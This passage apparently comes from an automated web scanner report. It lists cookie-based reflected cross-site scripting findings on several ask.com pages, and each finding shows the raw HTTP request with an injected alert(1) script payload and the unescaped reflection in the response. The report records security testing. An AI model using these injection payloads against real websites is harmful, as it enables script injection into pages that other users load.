GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=06aabe"><script>alert(1)</script>5f5b1f54996 ; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=UTF-8 Cache-Control: no-cache Vary: Accept-Encoding Date: Thu, 24 Mar 2011 16:12:39 GMT Connection: close Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEyOjM5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:12:39 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:12:39 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 118575 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... <img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=qna&l=dir&o=0&ld=5489&sv=0a5c4075&p=ja-question&rf=0&ord=6588919&wz_cu=06aabe"><script>alert(1)</script>5f5b1f54996 " height=1 width=1 id="SessionTracker" />...[SNIP]...
1.18. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_sid cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /answers/7153311/is-nail-polish-bad-for-your-nails
Issue detail
The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 448cb'-alert(1)-'938aa2c9db6 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3448cb'-alert(1)-'938aa2c9db6
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:13:38 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEzOjM3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:13:37 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:13:37 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 118258 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... <iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=0144DB8DB86BB2CFE0A8DECE14D761F3448cb'-alert(1)-'938aa2c9db6 ;u3=0;u2=;ord=-628091965?" width="1" height="1" frameborder="0">...[SNIP]...
1.19. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_uid cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /answers/7153311/is-nail-polish-bad-for-your-nails
Issue detail
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b8a6'-alert(1)-'f2ed5ba8a49 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F37b8a6'-alert(1)-'f2ed5ba8a49 ; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Thu, 24 Mar 2011 16:13:12 GMT Connection: close Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEzOjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:13:11 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:13:11 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 118260 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... <iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0845DB8DB66BB2CFE0A8DECE14D761F37b8a6'-alert(1)-'f2ed5ba8a49 ;u4=0144DB8DB86BB2CFE0A8DECE14D761F3;u3=0;u2=;ord=-201217928?" width="1" height="1" frameborder="0">...[SNIP]...
1.20. http://www.ask.com/ja-ask-dialog [wz_cu cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /ja-ask-dialog
Issue detail
The value of the wz_cu cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4794"-alert(1)-"74436131dfe was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ja-ask-dialog?type=signin HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/html, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0b4794"-alert(1)-"74436131dfe ; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:07:09 GMT Connection: close Vary: Accept-Encoding Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:09 GMT; Path=/ Content-Length: 69091 ...[SNIP]... JASK.ask_dialog = JASK.ask_dialog(JASK.ask_dialog,{ "sessionTracker1":"http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=jaq&l=dir&o=0&ld=5489&sv=0a5c404e&p=ja-ask-dialog&rf=0&ord=3573624&wz_cu=0b4794"-alert(1)-"74436131dfe ", "sessionTracker2":"http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=jaq&l=dir&o=0&ld=5489&sv=0a5c404e&p=ja-ask-dialog&rf=0&ord=3573624&wz_cu=0b4794"-alert(1)-"74436131dfe", "sessi...[SNIP]...
1.21. http://www.ask.com/pictures [wz_cu cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictures
Issue detail
The value of the wz_cu cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6902"><script>alert(1)</script>42fb11faf5 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/pictureslanding?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0a6902"><script>alert(1)</script>42fb11faf5 ; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:10:26 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEwOjI2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:26 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:26 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 106893 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... <img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=p&l=dir&o=0&ld=5489&sv=0a5c4050&p=pictures&rf=0&ord=521318&wz_cu=0a6902"><script>alert(1)</script>42fb11faf5 " height=1 width=1 id="SessionTracker" />...[SNIP]...
1.22. http://www.ask.com/pictures [wz_cu cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictures
Issue detail
The value of the wz_cu cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71745"-alert(1)-"e6b3eee7903 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/pictureslanding?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=071745"-alert(1)-"e6b3eee7903 ; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Thu, 24 Mar 2011 16:10:28 GMT Connection: close Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEwOjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:28 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:28 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 106727 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... Image(); st.height = 1; st.width = 1; st.id = "SessionTracker"; st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=p&l=dir&o=0&ld=5489&sv=0a5c4050&p=pictures&rf=0&ord=5338033&wz_cu=071745"-alert(1)-"e6b3eee7903 "; </script>...[SNIP]...
1.23. http://www.ask.com/pictures [wz_sid cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictures
Issue detail
The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f7de'-alert(1)-'a5bf6391ec6 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/pictureslanding?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F35f7de'-alert(1)-'a5bf6391ec6 ; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Thu, 24 Mar 2011 16:10:48 GMT Connection: close Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEwOjQ4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:48 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:48 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 106418 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... <iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=0144DB8DB86BB2CFE0A8DECE14D761F35f7de'-alert(1)-'a5bf6391ec6 ;u3=0;u2=;ord=-313947270?" width="1" height="1" frameborder="0">...[SNIP]...
1.24. http://www.ask.com/pictures [wz_uid cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictures
Issue detail
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df97a'-alert(1)-'a1578735830 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/pictureslanding?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3df97a'-alert(1)-'a1578735830 ; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Thu, 24 Mar 2011 16:10:37 GMT Connection: close Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEwOjM2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:36 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:10:36 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 106419 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... <iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0845DB8DB66BB2CFE0A8DECE14D761F3df97a'-alert(1)-'a1578735830 ;u4=0144DB8DB86BB2CFE0A8DECE14D761F3;u3=0;u2=;ord=-1116380978?" width="1" height="1" frameborder="0">...[SNIP]...
1.25. http://www.ask.com/pictureslanding [wz_cu cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictureslanding
Issue detail
The value of the wz_cu cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 284b6"-alert(1)-"2961042f29c was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pictureslanding?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0284b6"-alert(1)-"2961042f29c ; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; 